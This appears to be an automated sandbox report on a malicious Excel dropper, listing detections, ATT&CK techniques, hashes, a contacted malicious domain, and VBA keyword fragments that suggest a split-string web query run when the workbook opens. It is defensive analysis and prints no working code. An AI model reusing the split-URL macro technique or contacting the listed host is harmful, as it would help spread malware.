Analysis Report doc2227740.xls
Overview
General Information
Detection
Score: | 52 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC |
| |
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for submitted file | Show sources |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | DNS query: | ||
Source: | DNS query: |
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
System Summary: |
---|
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | OLE indicator, VBA macros: | ||
Source: | OLE indicator, VBA macros: |
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Classification label: |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: | ||
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: | ||
Source: | Key opened: |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | Window found: | ||
Source: | Window found: |
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: |
Source: | Window detected: | ||
Source: | Window detected: |
Source: | Key opened: | ||
Source: | Key opened: |
Source: | File opened: | ||
Source: | File opened: |
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Path Interception | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution3 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Scripting11 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
21% | ReversingLabs | Document-Excel.Dropper.SDrop |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
No Antivirus matches |
---|
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
sherpa.rest | 104.27.173.15 | true | false | unknown |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
104.27.173.15 | unknown | United States | 13335 | CLOUDFLARENETUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Red Diamond |
Analysis ID: | 320290 |
Start date: | 19.11.2020 |
Start time: | 08:39:53 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 13m 34s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | doc2227740.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 4 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal52.evad.winXLS@1/13@1/1 |
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
104.27.173.15 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
sherpa.rest | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
7dcce5b76c8b17472d024758970a406b | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 144008 |
Entropy (8bit): | 0.30838800698977753 |
Encrypted: | false |
SSDEEP: | 48:I3cnqOA64MnlEManSj8QIAEYtUO/Xrm0RMGk8fB58cE8ny6Dn:Keqp0KMgSihIUO/bm0RMGk2B58cE8ys |
MD5: | A9B61ED0B8FF3555959ACA5EC1BBFBC6 |
SHA1: | E06D7B42CE25F326583F0B8C0420B5B8C29B7CEB |
SHA-256: | 5FA33B89DDA4C07247D5485C346C59140EDCC868A089497335179CDD2B6406A1 |
SHA-512: | 92C29C6114AB7F7AF5DB650768DEAC8D746F9D5C67C65B4BA7D149EAF5361C69F3D4ECC8EA0D71C56FB19C7D91920EF49F017B83379E6CD5FE0F0E2BBEC9176F |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 156816 |
Entropy (8bit): | 0.6706128002931875 |
Encrypted: | false |
SSDEEP: | 96:KBmuK829knn1P3RoIJxgTVbgZ/am5Ma01kP6WDkjk3XtbYkGQPx3:s2knnZm8gT5YJMyZRN |
MD5: | 537D8D39EC19606699121491C7BBC30F |
SHA1: | D812B3CFD45A37595012677015B45713ADBB491B |
SHA-256: | 27795C711CA0A573A9C132B940CE12C29BC219B9A9460BF1720742ADE2800F20 |
SHA-512: | A8A900864DB97C45CE98326CCD53F00086B339464C5EBB1D424C235B1E27DC0235E01561BB00301A13C6D61FC3E00E1ACEF1BA5A2CD8D19E9D342918E2F9618E |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 133 |
Entropy (8bit): | 4.285981450597859 |
Encrypted: | false |
SSDEEP: | 3:yVlgQPDRlgsRlzZP+0GrekSlWW3W6yX8lmlmhIf276:yPdPDDblztGrekS9W/kmYIf22 |
MD5: | 311D741FB8DADAA8776ED6B5E2798678 |
SHA1: | F6AB7EFC73F1FBB0A8A191FFE56883B349F732EA |
SHA-256: | 9A0AD1ED9C6DD6C327F2405DC5BCB23583600234EA73B05482CB878157FDF5B5 |
SHA-512: | B3278FFB306E9C91672D00D1C1E777D9C5B4AB115638C36EB6E6437979268057DE37393BE3E4B70261EAC2259621E77BE9B7386554833F85509C80CE812F59F4 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 144008 |
Entropy (8bit): | 0.3079160641624455 |
Encrypted: | false |
SSDEEP: | 48:I3NSYOXcjdFgaiEpZlGktDpXElXDu5y+VD6aWIpDZCnkrhD7xnvX2jugv5z9pSjG:K0YHSUZlDxEZu5N1pBAn0Z7M4e4z8 |
MD5: | F6B6E12BBADC43D1C575B6CF792D4FF1 |
SHA1: | A93623DA1281ECF637C69C765FA33EF66DA1F95A |
SHA-256: | A0179A17F0A8417184D6CA684BC79C8F6B4741E80D2BF178A3F9165EFDA26F35 |
SHA-512: | 605047A1185125E02941E45BBE71216FADA07A4AD4855D368EB67CE4C83263E86A99D73395384AFF7D42C563BD67C6B2910F089C395A560336F3BC335C5803E5 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 149973 |
Entropy (8bit): | 0.2785807174593322 |
Encrypted: | false |
SSDEEP: | 48:I38Z029GZvqKZ/a38Z/eysZbGdhITRkcPSc+W42ZcIwYPqSGqSUVZRCAyZL:KV2qq08a6khI8cEZA |
MD5: | 5288C191787983E4A9873ACFA314AC33 |
SHA1: | F282592FF1E3A8EBE3A2C1283086EDD923C14AA9 |
SHA-256: | F2EEFCD038500D7E36AAE3C95BF36E8E0729AB95636AF9138F63257D4DDD1275 |
SHA-512: | C5E3F399145CC35FA7140DEF751C681BFE0B1F59780F346C63AA59701C9E562DFBC20B166893BFACF4967E2B2C066F256CEDD6B23810EC3FDFD16D411932F634 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 133 |
Entropy (8bit): | 4.255906262627934 |
Encrypted: | false |
SSDEEP: | 3:yVlgQPDRlgsRlz/Kj83kl0QJKGqsIUnC700Z276:yPdPDDblzbs0QEGaUn1u22 |
MD5: | FC89710189E7C81130CAC40D0F180CCD |
SHA1: | BE07D37034D0D6E2394B5C3AC47F28EB78767E9E |
SHA-256: | D87C78CFD7A26F6649FA650118F9E464D73DB9EF1CB975817534018A60174F61 |
SHA-512: | A7E6559F09730EFF0004CB1A8300D962CEBCCC714D3018AD8600CEFB097040B96D5C2DC337AE82DEF42CEE705A6418A9333922DD4ED5FFABA3BD1BB1894A978F |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 49323 |
Entropy (8bit): | 7.7680995170984595 |
Encrypted: | false |
SSDEEP: | 768:h6sNvPeq3D7Q+pAiQxukc6/85Hv16i8745Cpp1HXSDBP+/TGkrTIdJ6YAYOpkjce:hL7dFE8h1A7gCprSVW/T9rkb6zYygce |
MD5: | AFD7B03C25F9C65F6470B21FEC9B9583 |
SHA1: | 9C1BABAE806C2E04A1B0BD782087E331437B677A |
SHA-256: | FA9D14B316C82357764F99BDD15D69CFE5AAEA4AE2D4293100A315915CCCAFFB |
SHA-512: | 9DE9522CF4B94755EB48D5E8B9B96FAA32113103A0513DFCD0346BB093E1D38A89CE570F1AB2E61FB6556BF22A21DF8AC9627F48D902A9B88C533C112934F75A |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162688 |
Entropy (8bit): | 4.254390210877129 |
Encrypted: | false |
SSDEEP: | 1536:C6XL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CuJNSc83tKBAvQVCgOtmXmLpLm4l |
MD5: | 6F4AAED698A1513669A959E29DC5C6F2 |
SHA1: | 6A605C026EF516597E03EFE5FC9D397D7B91110F |
SHA-256: | D3059A80AFF09E691B3EEB371730DAFA842F171727C80BC3DCFF8CD1539D9631 |
SHA-512: | DA7BF949F91717644E0A32B1B843793F8C8C91ACA59722497966469ECA90E22D185BD4374E682EFCF860BFE7FDC3C1F201B1CC2E96B4B3C35119B23EDAEA86E2 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 137348 |
Entropy (8bit): | 0.05967248714825173 |
Encrypted: | false |
SSDEEP: | 12:I3DPBWR7OF2oO1fv8pAxnOB1PBWRKgOSSQaphOfP/7yPBWR/Nf4OdKp:I3NJTOMAROBHSOSqhO+SyOy |
MD5: | 6D4AB7FCCB2F8F79E152AF821B194F6D |
SHA1: | 49344E69BBA72212EE6FB40B48D2AE5D5833D328 |
SHA-256: | EDAAF11F25B09EFAA274FF72F2670913C6D7281356EC46A3738386063AAB7A3C |
SHA-512: | C8E2A22E66E947B8035DCAE7BE443F0DE1E18AFD6B3D50B7FF367607D0DD89F3A2BA473E00E3378A64C5758BFA0F58AEC57D541A93F8649E208AAC06D5B25665 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 137348 |
Entropy (8bit): | 0.0597466555271492 |
Encrypted: | false |
SSDEEP: | 12:I3DPgaoPe8CKfv8p6Gv1PgaoPD0DOJcSQapzvjp/7yPgaoPrBvKp:I3cn28u6Gvmn4WcqzrPndw |
MD5: | AD6ECCAAD220C6D4DF9762E3D64446AE |
SHA1: | BC04303DF31488C8606C4095BAAC160F99F3B240 |
SHA-256: | 18335078078CB0AAFAA80FE2ADF5FEBA72A5F6F2D017C694A920F555DD2C859B |
SHA-512: | 158B7B3D4F84A540FD9B25369A8791515FD790899BCD6C6485BE18FB3956A75AAB4719FFE777DE41406F9AE3DEE0BCCA1D58AD29A65AFE3A787F5D0187BCC95B |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.478347873895743 |
Encrypted: | false |
SSDEEP: | 12:85Q0ZhCLgXg/XAlCPCHaXtB8XzB/rrCX+WnicvbjbDtZ3YilMMEpxRljKfkcTdJU:85RhU/XTd6j0YebDv3qekwrNru/ |
MD5: | B43C9756F00C7F10CE17BA5CD8CE8E70 |
SHA1: | AF18D1CFBA491DF5D31E6C1A3FB9BEAAF9A020CB |
SHA-256: | BDC1084BE45505EDC00E0700CA42282F52E624A0824D5AE85DFD03B9507A17B2 |
SHA-512: | 29434D36DF2736587A461D39BC96CB90D05E2CD06201D0CAC99BB16C11427F0104D6F637598E5469F939B7C85EA383A014803843FC9A074AA68FAB6E045BFEC1 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 15 |
Entropy (8bit): | 3.906890595608518 |
Encrypted: | false |
SSDEEP: | 3:oyBVov:djy |
MD5: | CB81E25C045825270E2E97C347AE6E8F |
SHA1: | 2069CD47D19BCC5F24D31854972702CEC4C9E9A1 |
SHA-256: | FEC9B386E88BFD7FEC4BA72FDC006A003ECC079E2C204947A57872BB4ED7340A |
SHA-512: | C2EFAA0A03E287CDE5029DC00457A1A2D1D877649E88D5E27F462B5A4145B366D181239C77F101A09D61CD3C07AD9DAF8DEFAC2FE224625D63EEFF18B7044910 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 113 |
Entropy (8bit): | 4.380074810237285 |
Encrypted: | false |
SSDEEP: | 3:GmM/8XtF9BkGEQrQtOK7XcM/CQfzFQ/u3VT/n:XM/Af2QEfcQ5JRn |
MD5: | 62D6896587AF5C4E4AE819335D822CD0 |
SHA1: | 63F004900567837EB5D2C8C6412A7F8FED960279 |
SHA-256: | 02421F20DFDF6D7331D1CA21FBBE6CB0D69B5998023AA9094C8963D66F0B9B88 |
SHA-512: | E804B7AE4CE1FF2817EE9998501A04A16AF83DF81778FAE463CCB54B0E7305C12F8CFB73EE8DD41A4D441CE885D2255B3F4BB949DFB86CFDC22B73D564BF9409 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 4.360697246981449 |
TrID: |
|
File name: | doc2227740.xls |
File size: | 88576 |
MD5: | b43d8b40f9ef15965d0ff901e30c2f32 |
SHA1: | 3c0d89ac4b439b7cf60b6cc6e4195a8ce3514572 |
SHA256: | 196588a7404c90ab92502926afa24fbb25bf67c0ad50dba4f7ff4f1937816dda |
SHA512: | 57e42961b4ffe2b4233e05e8619a4dd59a9f00a7c68bf4cc57843cb6f3803c51c727287d9407c4787b5fb8be2caff1105e30abd4c82c9ccc3b335ff9e754c72e |
SSDEEP: | 1536:C3xEtjPOtioVjDGUU1qfDlaGGx+cL2QnAUA4duNxABg/geJtJSuAO1arCFsi:C3xEtjPOtioVjDGUU1qfDlaGGx+cL2QD |
File Content Preview: | ........................>...................................P.................................................................................................................................................................................................. |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "doc2227740.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Keywords: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2020-11-18 06:47:39 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Category: | |
Thumbnail Scaling Desired: | False |
Manager: | |
Company: | |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 983040 |
Streams with VBA |
---|
VBA File Name: Sheet1.cls, Stream Size: 5844 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/Sheet1 |
VBA File Name: | Sheet1.cls |
Stream Size: | 5844 |
Data ASCII: | . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . l : . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . . . . . . . b R 3 N M . f I . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . # I . A . . X N . . . V . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . # I . A . . X N . . . V . . . b R 3 N M . f I . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 01 00 03 00 01 00 00 cc 05 00 00 e4 00 00 00 38 02 00 00 fb 05 00 00 09 06 00 00 85 10 00 00 00 00 00 00 01 00 00 00 a7 f5 6c 3a 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 3c 00 ff ff 00 00 d1 cf 0f 62 52 33 4e 4d 98 66 49 f6 90 cb a7 dd 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
BackgroundQuery:=False |
TEXTJOIN(Delimiter |
.AdjustColumnWidth |
True, |
(Len(x) |
seconds) |
.WebConsecutiveDelimitersAsOne |
Public |
.WebFormatting |
Resume |
Mid(TEXTJOIN, |
"Range" |
ActiveSheet.QueryTables.Add(Connection:= |
While |
.WorkbookConnection.Delete |
False |
Wait(seconds |
"htt" |
www.TheSpreadsheetGuru.com |
xlInsertDeleteCells |
MakeWebQuery |
String, |
Cell.Value |
Excel |
"lol" |
String |
MakeWebQuery() |
Len(RangeArea) |
Len(Cell.Value) |
.Refresh |
Destination:= |
.WebSelectionType |
VB_GlobalNameSpace |
shFirstQtr |
Range |
.FillAdjacentFormulas |
"ps:" |
.PreserveFormatting |
.BackgroundQuery |
"info.p" |
.WebDisableDateRecognition |
Through |
RangeArea |
VB_Base |
Boolean, |
.WebSingleBlockTextImport |
.PostText |
Given |
VB_Creatable |
VB_Exposed |
Input |
Entered |
Integer) |
VB_TemplateDerived |
Empty |
(Timer |
Ignore_Empty |
.WebPreFormattedTextToColumns |
ParamArray |
.SavePassword |
'SOURCE: |
"info" |
Worksheet_Activate() |
Error |
.WebDisableRedirections |
Attribute |
'PURPOSE: |
VB_PredeclaredId |
Timer() |
VB_Name |
Private |
TypeName(RangeArea) |
CONCAT |
"//sherpa" |
Function |
Variant |
xlWebFormattingNone |
Len(Delimiter) |
VB_Customizable |
".rest/wp-" |
"pic" |
DoEvents |
'.RefreshStyle |
xlEntirePage |
swedr |
'Text |
"URL;" |
Delimiter |
.RefreshOnFileOpen |
.RowNumbers |
'Loop |
Variant) |
Replicates |
Worksheet_Calculate() |
TEXTJOIN |
.RefreshPeriod |
TEXTJOIN("", |
VBA Code |
---|
|
VBA File Name: Sheet2.cls, Stream Size: 977 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/Sheet2 |
VBA File Name: | Sheet2.cls |
Stream Size: | 977 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ [ . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a7 f5 5c 5b 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: Sheet3.cls, Stream Size: 977 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/Sheet3 |
VBA File Name: | Sheet3.cls |
Stream Size: | 977 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a7 f5 bd 71 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: Sheet4.cls, Stream Size: 977 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/Sheet4 |
VBA File Name: | Sheet4.cls |
Stream Size: | 977 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . c . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a7 f5 63 fc 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: Sheet5.cls, Stream Size: 977 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/Sheet5 |
VBA File Name: | Sheet5.cls |
Stream Size: | 977 |
